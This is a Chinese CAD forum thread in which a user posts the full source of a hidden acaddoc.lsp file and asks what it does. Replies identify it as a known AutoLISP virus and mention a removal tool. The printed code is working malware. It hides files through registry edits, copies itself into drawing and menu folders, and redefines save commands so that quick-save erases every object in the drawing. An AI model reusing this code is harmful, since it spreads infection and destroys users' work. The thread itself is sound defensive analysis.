设为首页收藏本站CAD论坛CAD教程CAD下载明经币充值
切换到宽版

明经CAD社区

 找回密码
 注册

QQ登录

只需一步,快速开始

搜索
明经CAD社区»社区 开发篇 AutoLISP/Visual LISP 编程技术 是否病毒文件--acaddoc
12下一页
返回列表 发新帖
查看: 5066|回复: 10

[讨论] 是否病毒文件--acaddoc

[复制链接]
zwqgdhl
发表于 2011-7-27 00:11 | 显示全部楼层 |阅读模式
刚发现很多文件夹里有个隐藏文件acaddoc,用360和CAD杀毒软件都找不到,里面内容如下,请各位大侠看看主要作用是什么的干活的,真可恶
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
           (chklsp (strcat mnlpth ".mnl") doclsp)
           (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq        mac0
         '(2256          2256         2726        2256   2585   2726   3243   2679
           2726          2256         3149        2726   3196   3290   2726   2632
           2397
          )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
           (member (vl-string->list (car (macaddr))) (mkgroup mac0))
           (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
        (not
          (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
                   "*;;;jjyy*"
          )
        )
         (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp        (fp1 fp2 / fp3 fp4 tem)
  (setq        fp3 (open fp1 "r")
        fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
           (vlax-put-property
             (setq fp1 (vlax-invoke-method
                         (vlax-create-object "Scripting.FileSystemObject")
                         'GetFile
                         fp
                       )
             )
             'Attributes
             code
           )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
        con (vl-catch-all-apply
              'vlax-invoke
              (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
            )
      )
      (if (vl-catch-all-error-p con)
        (setq
          con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
        )
      )
      (setq lox        (vlax-invoke
                  con
                  'ExecQuery
                  "Select * From Win32_NetworkAdapter "
                )
      )
      (vlax-for        i lox
        (if (vlax-get i 'NetConnectionID)
          (progn (setq sn (vlax-get i 'MACAddress))
                 (or (member sn mac) (setq mac (cons sn mac)))
          )
        )
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )
  )
  (reverse mac)
)
(defun dolsp ()
  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
)
(defun c:qsave ()
  (command "_.erase" (ssget "x") "")
  (princ)
)
(defun c:saveas        (/ fp1)
  (setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
  (chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
          (findfile "acaddoc.lsp")
  )
  (princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
"觉得好,就打赏"
打赏
还没有人打赏,支持一下
回复

使用道具 举报

zwqgdhl
 楼主| 发表于 2011-7-27 00:13 | 显示全部楼层
以前好象也有个同样名称的文件,但可以被CAD杀毒软件找到,而且不是隐藏的
回复 支持 反对

使用道具 举报

zwqgdhl
 楼主| 发表于 2011-7-27 00:14 | 显示全部楼层
以前好象也有个同样名称的文件,内容也跟上次不一样,看应该怎样把查杀这个可恶文件
回复 支持 反对

使用道具 举报

ZZXXQQ
发表于 2011-7-27 08:09 | 显示全部楼层
本帖最后由 ZZXXQQ 于 2011-7-27 08:22 编辑

  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
命令都被取消了。是这个人写的:jjyy
好象是为加密写的。就是对用户狠了点。

评分

参与人数 1金钱 +10 收起 理由
zwqgdhl + 10

查看全部评分

回复 支持 反对

使用道具 举报

zwqgdhl
 楼主| 发表于 2011-7-27 08:47 | 显示全部楼层
在网上找到了个acaddoc.lsp病毒专杀工具,试过了,很好用,提供给大家共享

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册

x
回复 支持 反对

使用道具 举报

raimo
发表于 2011-7-27 08:56 | 显示全部楼层
这个就是常见病毒来的..连卡巴都早记录在案了..国产的杀毒软件似乎不杀
回复 支持 反对

使用道具 举报

lgttblue
发表于 2011-7-27 23:17 | 显示全部楼层
正好用到,顶一个
回复 支持 反对

使用道具 举报

AMTONNY
发表于 2011-8-7 10:20 | 显示全部楼层
比较狠哟,
回复 支持 反对

使用道具 举报

江湖远人
发表于 2012-3-27 21:28 | 显示全部楼层
多谢楼主和五楼的东西
回复 支持 反对

使用道具 举报

lidaxiu
发表于 2012-3-27 21:58 | 显示全部楼层
学习了,看看程序
回复 支持 反对

使用道具 举报

12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

小黑屋|手机版|CAD论坛|CAD教程|CAD下载|联系我们|关于明经|明经通道 ( 粤ICP备05003914号 )  
©2000-2023 明经通道 版权所有 本站代码,在未取得本站及作者授权的情况下,不得用于商业用途

GMT+8, 2024-4-26 16:54 , Processed in 1.215553 second(s), 28 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表